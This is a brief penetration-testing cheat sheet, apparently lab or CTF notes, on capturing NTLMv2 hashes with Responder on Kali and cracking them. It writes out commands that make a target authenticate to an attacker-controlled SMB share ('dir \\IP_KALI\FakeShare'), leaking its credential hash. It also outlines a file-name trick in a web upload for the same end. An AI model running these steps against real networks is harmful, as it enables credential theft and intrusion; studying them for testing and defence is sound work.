Capturing and cracking NTLMv2 hash.
Purpose
[SMB share] Steps for capturing and Cracking NTLMv2 hash (SMB)
Step 1: Start the responder on kali
# Start responder
sudo responder -I <YouVPNTunnelInterface>
# Example:
# sudo responder -I tun0Step 2: Make a fake request for share
# Run below command in Shell.
dir \\IP_KALI\FakeShareStep 3: Store hash and crack it
[Website-Upload] Steps and example of exploiting Web upload for hash
Step 1: Find upload directory or place from where you can upload file.
Step 2: Upload the file
Step 3: Start the responder on kali
Step 4: Capture the request using burp suite and change it's file name



Step 5: Cracking the hash
Last updated